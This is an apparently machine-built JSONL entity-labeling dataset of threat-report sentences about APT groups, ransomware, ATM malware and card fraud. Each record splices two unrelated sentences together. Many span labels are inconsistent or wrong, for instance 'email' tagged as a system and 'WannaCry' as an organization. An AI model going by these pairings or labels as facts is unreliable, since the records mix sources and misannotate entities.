{"text": "As we noted in M-Trends 2016 , Mandiant\u2019s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment , so 99 days is still 96 days too long . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": [{"start": 15, "end": 23, "label": "Organization"}, {"start": 31, "end": 41, "label": "Organization"}, {"start": 226, "end": 244, "label": "Organization"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 358, "end": 366, "label": "Organization"}, {"start": 391, "end": 411, "label": "Organization"}]}
{"text": "On top of our analysis of recent trends , M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": [{"start": 42, "end": 50, "label": "Organization"}, {"start": 83, "end": 90, "label": "Organization"}, {"start": 151, "end": 156, "label": "Organization"}, {"start": 177, "end": 183, "label": "System"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 223, "end": 240, "label": "Organization"}]}
{"text": "In Figure 1 , which is based on FireEye Dynamic threat Intelligence (DTI) reports shared in March 2017 , we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017 . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": [{"start": 32, "end": 39, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 253, "end": 268, "label": "Organization"}, {"start": 271, "end": 286, "label": "Organization"}, {"start": 293, "end": 303, "label": "Organization"}, {"start": 367, "end": 390, "label": "Organization"}]}
{"text": "Magnitude EK activity then fell off the radar until Oct. 15 , 2017 , when it came back and began focusing solely on South Korea . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 208, "end": 217, "label": "Organization"}]}
{"text": "The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 43, "end": 56, "label": "Vulnerability"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 112, "end": 132, "label": "System"}, {"start": 170, "end": 175, "label": "Organization"}, {"start": 242, "end": 254, "label": "Organization"}, {"start": 275, "end": 292, "label": "Organization"}]}
{"text": "Throughout the final quarter of 2016 and first month of 2017 , FireEye Dynamic Threat Intelligence (DTI) observed consistent Magnitude EK hits from several customers , the majority of whom reside in the APAC region . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": [{"start": 63, "end": 70, "label": "Organization"}, {"start": 125, "end": 137, "label": "System"}, {"start": 255, "end": 276, "label": "Indicator"}, {"start": 318, "end": 327, "label": "Organization"}, {"start": 356, "end": 361, "label": "Organization"}]}
{"text": "In January 2017 , new domain names appeared in the campaign hosted on a different IP location . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 111, "end": 118, "label": "Malware"}, {"start": 216, "end": 230, "label": "Organization"}]}
{"text": "Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": [{"start": 25, "end": 37, "label": "Malware"}, {"start": 82, "end": 87, "label": "Organization"}, {"start": 119, "end": 128, "label": "Organization"}, {"start": 131, "end": 136, "label": "Organization"}, {"start": 153, "end": 193, "label": "Organization"}, {"start": 280, "end": 300, "label": "Organization"}]}
{"text": "This trend continued until late September 2017 , when we saw Magnitude EK focus primarily on the APAC region , with a large chunk targeting South Korea . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": [{"start": 61, "end": 73, "label": "System"}, {"start": 160, "end": 166, "label": "Organization"}, {"start": 189, "end": 198, "label": "Organization"}, {"start": 209, "end": 222, "label": "Organization"}, {"start": 283, "end": 304, "label": "Organization"}, {"start": 307, "end": 318, "label": "Organization"}, {"start": 321, "end": 332, "label": "Organization"}, {"start": 339, "end": 349, "label": "Organization"}]}
{"text": "These ransomware payloads only seem to target Korean systems , since they won\u2019t execute if the system language is not Korean . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 6, "end": 16, "label": "System"}, {"start": 147, "end": 155, "label": "Malware"}, {"start": 222, "end": 231, "label": "Organization"}, {"start": 272, "end": 290, "label": "Organization"}, {"start": 314, "end": 323, "label": "Organization"}]}
{"text": "The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 168, "end": 187, "label": "System"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 232, "end": 240, "label": "Malware"}, {"start": 308, "end": 316, "label": "Organization"}, {"start": 408, "end": 415, "label": "Malware"}]}
{"text": "In our Revoke-Obfuscation white paper , first presented at Black Hat USA 2017 , we provide background on obfuscated PowerShell attacks seen in the wild , as well as defensive mitigation and logging best practices . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 59, "end": 68, "label": "Organization"}, {"start": 292, "end": 300, "label": "Organization"}, {"start": 392, "end": 399, "label": "Malware"}]}
{"text": "The malware leverages an exploit , codenamed EternalBlue\u201d , that was released by the Shadow Brokers on April 14 , 2017 . Gallmaker 's targets are embassies of an Eastern European country .", "spans": [{"start": 45, "end": 57, "label": "Vulnerability"}, {"start": 85, "end": 99, "label": "Organization"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 146, "end": 155, "label": "Organization"}]}
{"text": "The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD (via Bitcoin) to decrypt the data . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 50, "end": 65, "label": "Malware"}, {"start": 221, "end": 225, "label": "Organization"}, {"start": 259, "end": 267, "label": "Malware"}, {"start": 297, "end": 306, "label": "Organization"}]}
{"text": "The malware then builds two DLLs in memory \u2013 they are 32 and 64-bit DLLs that have identical functionality . 360 and Tuisec already identified some Gorgon Group members .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 28, "end": 32, "label": "Malware"}, {"start": 109, "end": 112, "label": "Organization"}, {"start": 117, "end": 123, "label": "Organization"}, {"start": 148, "end": 160, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}]}
{"text": "The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 50, "end": 61, "label": "Malware"}, {"start": 145, "end": 153, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 225, "end": 234, "label": "Organization"}]}
{"text": "The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 51, "end": 55, "label": "Malware"}, {"start": 56, "end": 79, "label": "Malware"}, {"start": 126, "end": 133, "label": "Organization"}, {"start": 154, "end": 160, "label": "System"}, {"start": 211, "end": 224, "label": "Organization"}, {"start": 236, "end": 259, "label": "Organization"}]}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 110, "end": 123, "label": "Organization"}, {"start": 173, "end": 179, "label": "System"}, {"start": 194, "end": 208, "label": "Organization"}]}
{"text": "Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": [{"start": 15, "end": 22, "label": "Malware"}, {"start": 27, "end": 33, "label": "Malware"}, {"start": 170, "end": 183, "label": "Organization"}, {"start": 204, "end": 212, "label": "Malware"}, {"start": 257, "end": 276, "label": "Organization"}]}
{"text": "We recently observed a resurgence of the same phishing campaign when our systems detected roughly 90 phony Apple-like domains that were registered from July 2016 to September 2016 . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": [{"start": 204, "end": 214, "label": "Organization"}, {"start": 228, "end": 234, "label": "Organization"}]}
{"text": "In this blog we provide insight into the tactics , techniques and procedures (TTPs) of a Brazilian cyber crime group that specializes in payment card fraud operations . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 105, "end": 116, "label": "Organization"}, {"start": 200, "end": 206, "label": "Organization"}, {"start": 241, "end": 251, "label": "Organization"}]}
{"text": "The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 32, "end": 44, "label": "Organization"}, {"start": 320, "end": 333, "label": "Organization"}, {"start": 368, "end": 378, "label": "Organization"}]}
{"text": "Once in their possession , the actors use these compromised payment card credentials to generate further card information . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": [{"start": 31, "end": 37, "label": "Organization"}, {"start": 124, "end": 141, "label": "Organization"}, {"start": 192, "end": 200, "label": "Organization"}]}
{"text": "The members of the group use a variety of tools , including CCleaner , on a daily basis to effectively remove any evidence of their operations . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 60, "end": 68, "label": "System"}, {"start": 179, "end": 194, "label": "Organization"}, {"start": 260, "end": 266, "label": "Organization"}]}
{"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": [{"start": 36, "end": 42, "label": "Organization"}, {"start": 141, "end": 146, "label": "Organization"}, {"start": 167, "end": 183, "label": "Organization"}, {"start": 199, "end": 219, "label": "Organization"}, {"start": 250, "end": 269, "label": "Organization"}, {"start": 272, "end": 283, "label": "Organization"}, {"start": 301, "end": 311, "label": "Organization"}]}
{"text": "For this purpose , these actors often use tools such as Technitium MAC Address Changer . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": [{"start": 25, "end": 31, "label": "Organization"}, {"start": 56, "end": 86, "label": "System"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 141, "end": 149, "label": "Organization"}, {"start": 152, "end": 162, "label": "Organization"}, {"start": 167, "end": 187, "label": "Organization"}, {"start": 190, "end": 203, "label": "Organization"}, {"start": 211, "end": 216, "label": "Organization"}, {"start": 219, "end": 225, "label": "Organization"}, {"start": 230, "end": 253, "label": "Organization"}, {"start": 256, "end": 259, "label": "Organization"}, {"start": 268, "end": 279, "label": "Organization"}, {"start": 282, "end": 299, "label": "Organization"}, {"start": 304, "end": 330, "label": "Organization"}]}
{"text": "We have observed these actors using Tor or proxy-based tools similar to Tor (e.g , UltraSurf , as seen in Figure 2) . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": [{"start": 23, "end": 29, "label": "Organization"}, {"start": 36, "end": 39, "label": "System"}, {"start": 43, "end": 60, "label": "System"}, {"start": 118, "end": 130, "label": "Organization"}, {"start": 164, "end": 182, "label": "Organization"}, {"start": 185, "end": 195, "label": "Organization"}, {"start": 198, "end": 205, "label": "Organization"}, {"start": 208, "end": 211, "label": "Organization"}, {"start": 218, "end": 250, "label": "Organization"}, {"start": 309, "end": 327, "label": "Organization"}, {"start": 336, "end": 348, "label": "Organization"}]}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 199, "end": 211, "label": "Organization"}, {"start": 242, "end": 251, "label": "Organization"}]}
{"text": "Based on our observations , this group uses a variety of different methods to either compromise or acquire already compromised payment card credentials . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 33, "end": 38, "label": "Organization"}, {"start": 259, "end": 272, "label": "Organization"}, {"start": 290, "end": 303, "label": "Organization"}, {"start": 309, "end": 320, "label": "Organization"}, {"start": 375, "end": 385, "label": "Organization"}]}
{"text": "Payment card dumps are commonly shared amongst Brazilian threat actors via social media forums such as Facebook , Skype , and web-based WhatsApp messenger . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 64, "end": 70, "label": "Organization"}, {"start": 75, "end": 94, "label": "Organization"}, {"start": 197, "end": 210, "label": "Organization"}, {"start": 226, "end": 239, "label": "Organization"}, {"start": 245, "end": 256, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}]}
{"text": "Similarly , the group takes advantage of freely available consolidations of email credentials , personal information , and other data shared in eCrime forums for fraud purposes . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 16, "end": 21, "label": "Organization"}, {"start": 76, "end": 93, "label": "System"}, {"start": 96, "end": 116, "label": "System"}, {"start": 179, "end": 183, "label": "Malware"}, {"start": 257, "end": 272, "label": "Organization"}, {"start": 275, "end": 294, "label": "Organization"}, {"start": 297, "end": 316, "label": "Organization"}, {"start": 387, "end": 396, "label": "Organization"}, {"start": 404, "end": 412, "label": "Vulnerability"}, {"start": 445, "end": 449, "label": "Malware"}]}
{"text": "These actors scan websites for vulnerabilities to exploit to illicitly access databases . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": [{"start": 6, "end": 12, "label": "Organization"}, {"start": 90, "end": 95, "label": "Organization"}, {"start": 194, "end": 206, "label": "Malware"}, {"start": 228, "end": 237, "label": "Organization"}]}
{"text": "They most commonly target Brazilian merchants , though others use the same tactics to exploit entities outside Brazil . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 157, "end": 169, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 255, "end": 273, "label": "Organization"}, {"start": 276, "end": 298, "label": "Organization"}, {"start": 301, "end": 312, "label": "Organization"}, {"start": 315, "end": 334, "label": "Organization"}]}
{"text": "The group also uses the SQL injection (SQLi) tools Havij Advanced SQL Injection Tool and SQLi Dumper version 7.0 (Figure 4) to scan for and exploit vulnerabilities in targeted eCommerce sites . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 24, "end": 37, "label": "System"}, {"start": 250, "end": 259, "label": "Organization"}, {"start": 267, "end": 281, "label": "Malware"}]}
{"text": "At least eight sellers update the website as frequently as daily , offering newly obtained databases from the U.S . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 141, "end": 151, "label": "Organization"}, {"start": 156, "end": 165, "label": "Organization"}, {"start": 210, "end": 230, "label": "Organization"}]}
{"text": "Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": [{"start": 42, "end": 58, "label": "System"}, {"start": 67, "end": 73, "label": "Organization"}, {"start": 313, "end": 321, "label": "Organization"}, {"start": 348, "end": 363, "label": "Organization"}, {"start": 397, "end": 417, "label": "Organization"}]}
{"text": "One bulk card-checking tool this group uses is Testador Amazon.com v1.1 ( Figure 8 ) . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 4, "end": 22, "label": "System"}, {"start": 33, "end": 38, "label": "Organization"}, {"start": 87, "end": 96, "label": "Organization"}, {"start": 145, "end": 148, "label": "System"}, {"start": 281, "end": 284, "label": "Organization"}, {"start": 287, "end": 290, "label": "Organization"}, {"start": 297, "end": 320, "label": "Organization"}, {"start": 350, "end": 360, "label": "Organization"}]}
{"text": "Despite its name , this tool does not use Amazon\u2019s website , but exploits an unauthenticated Cross-Site Request Forgery (CSRF) vulnerability of a merchant website allowing the abuse of PayPal Payflow link functionality (Figure 9) . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 185, "end": 199, "label": "System"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 290, "end": 293, "label": "System"}, {"start": 426, "end": 429, "label": "Organization"}, {"start": 432, "end": 435, "label": "Organization"}, {"start": 442, "end": 465, "label": "Organization"}, {"start": 495, "end": 505, "label": "Organization"}]}
{"text": "Based on our observations of interactions in this channel , between May 2016 and June 2016 , malicious actors validated 2 , 987 cards from 62 countries , with the most coming from the U.S. (nearly half) , Brazil , and France . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": [{"start": 103, "end": 109, "label": "Organization"}, {"start": 242, "end": 261, "label": "Organization"}, {"start": 397, "end": 406, "label": "Organization"}]}
{"text": "The actors frequently use the stolen data to create cloned physical cards , which they use to attempt to withdraw funds from ATMs . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 160, "end": 166, "label": "System"}, {"start": 192, "end": 201, "label": "Indicator"}, {"start": 205, "end": 244, "label": "Organization"}]}
{"text": "The group primarily uses the MSR 606 Software (Figure 12) and Hardware (Figure 13) to create cloned cards . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 29, "end": 45, "label": "System"}, {"start": 62, "end": 70, "label": "System"}, {"start": 123, "end": 131, "label": "Organization"}, {"start": 234, "end": 243, "label": "Organization"}]}
{"text": "However , Brazilian actors commonly use several methods to do so , such as reselling cards they have created , paying bills with stolen cards in return for a portion of the bill's value and reselling illicitly obtained goods . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": [{"start": 20, "end": 26, "label": "Organization"}, {"start": 294, "end": 313, "label": "Organization"}, {"start": 318, "end": 339, "label": "Organization"}]}
{"text": "Some attacker tools were used to almost exclusively target organizations within APAC . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": [{"start": 5, "end": 13, "label": "Organization"}, {"start": 101, "end": 108, "label": "Organization"}, {"start": 136, "end": 157, "label": "Organization"}]}
{"text": "In April 2015 , we uncovered the malicious efforts of APT30 , a suspected China-based threat group that has exploited the networks of governments and organizations across the region , targeting highly sensitive political , economic and military information . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": [{"start": 54, "end": 59, "label": "Organization"}, {"start": 134, "end": 145, "label": "Organization"}, {"start": 150, "end": 163, "label": "Organization"}, {"start": 201, "end": 220, "label": "Organization"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 236, "end": 244, "label": "Organization"}, {"start": 365, "end": 375, "label": "Organization"}, {"start": 469, "end": 478, "label": "Organization"}]}
{"text": "The individuals using Hancitor malware also known by the name Chanitor are no exception and have taken three approaches to deliver the malware in order to ultimately steal data from their victims . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations \u2014 including organizations related to Chinese minority ethnic groups .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 22, "end": 30, "label": "System"}, {"start": 62, "end": 70, "label": "System"}, {"start": 260, "end": 279, "label": "Organization"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 295, "end": 307, "label": "Organization"}, {"start": 310, "end": 319, "label": "Organization"}, {"start": 326, "end": 349, "label": "Organization"}, {"start": 395, "end": 417, "label": "Organization"}]}
{"text": "We recently observed Hancitor attacks against some of our FireEye Exploit Guard customers . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": [{"start": 21, "end": 29, "label": "Organization"}, {"start": 58, "end": 65, "label": "Organization"}, {"start": 185, "end": 203, "label": "Organization"}, {"start": 229, "end": 238, "label": "Organization"}]}
{"text": "The group has performed these activities at multiple locations across Brazil , possibly using multiple mules . Turla is a notorious group that has been targeting government officials .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 162, "end": 182, "label": "Organization"}]}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Turla is a notorious group that has been targeting diplomats .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 199, "end": 204, "label": "Organization"}, {"start": 250, "end": 259, "label": "Organization"}]}
{"text": "The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": [{"start": 149, "end": 157, "label": "Malware"}, {"start": 181, "end": 191, "label": "Malware"}, {"start": 270, "end": 279, "label": "Organization"}]}
{"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": [{"start": 48, "end": 52, "label": "Malware"}, {"start": 57, "end": 64, "label": "Malware"}, {"start": 175, "end": 184, "label": "Organization"}]}
{"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak trojan . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": [{"start": 76, "end": 84, "label": "Malware"}, {"start": 102, "end": 114, "label": "Malware"}, {"start": 183, "end": 192, "label": "Malware"}, {"start": 217, "end": 226, "label": "Organization"}]}
{"text": "In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER (due to the project name ATMRIPPER\u201d identified in the sample) and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 46, "end": 57, "label": "Malware"}, {"start": 78, "end": 84, "label": "Malware"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 285, "end": 290, "label": "Organization"}, {"start": 359, "end": 365, "label": "System"}, {"start": 378, "end": 405, "label": "Organization"}]}
{"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 7, "end": 29, "label": "Malware"}, {"start": 155, "end": 166, "label": "Malware"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 229, "end": 237, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 295, "end": 304, "label": "Organization"}, {"start": 307, "end": 326, "label": "Organization"}, {"start": 329, "end": 353, "label": "Organization"}, {"start": 360, "end": 382, "label": "Organization"}]}
{"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 19, "label": "Malware"}, {"start": 77, "end": 88, "label": "Organization"}, {"start": 98, "end": 128, "label": "Malware"}, {"start": 143, "end": 149, "label": "Organization"}, {"start": 238, "end": 268, "label": "Organization"}, {"start": 271, "end": 289, "label": "Organization"}, {"start": 305, "end": 322, "label": "Organization"}, {"start": 334, "end": 352, "label": "Organization"}]}
{"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": [{"start": 58, "end": 64, "label": "Malware"}, {"start": 70, "end": 89, "label": "Malware"}, {"start": 132, "end": 152, "label": "Organization"}]}
{"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 35, "end": 71, "label": "Malware"}, {"start": 76, "end": 105, "label": "Malware"}, {"start": 180, "end": 216, "label": "Organization"}]}
{"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist \u2013 an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": [{"start": 43, "end": 48, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 239, "end": 264, "label": "Organization"}, {"start": 270, "end": 280, "label": "Organization"}]}
{"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 84, "end": 94, "label": "Malware"}, {"start": 156, "end": 171, "label": "Malware"}, {"start": 236, "end": 240, "label": "Organization"}, {"start": 254, "end": 267, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}]}
{"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 85, "end": 94, "label": "Malware"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 244, "end": 266, "label": "Organization"}, {"start": 288, "end": 315, "label": "Organization"}]}
{"text": "The samples we identified target the ATM vendor Diebold . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 37, "end": 55, "label": "Organization"}, {"start": 58, "end": 64, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 240, "end": 252, "label": "Organization"}, {"start": 329, "end": 338, "label": "Organization"}]}
{"text": "This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": [{"start": 84, "end": 93, "label": "Malware"}, {"start": 111, "end": 120, "label": "Organization"}, {"start": 177, "end": 183, "label": "Organization"}, {"start": 197, "end": 216, "label": "Organization"}]}
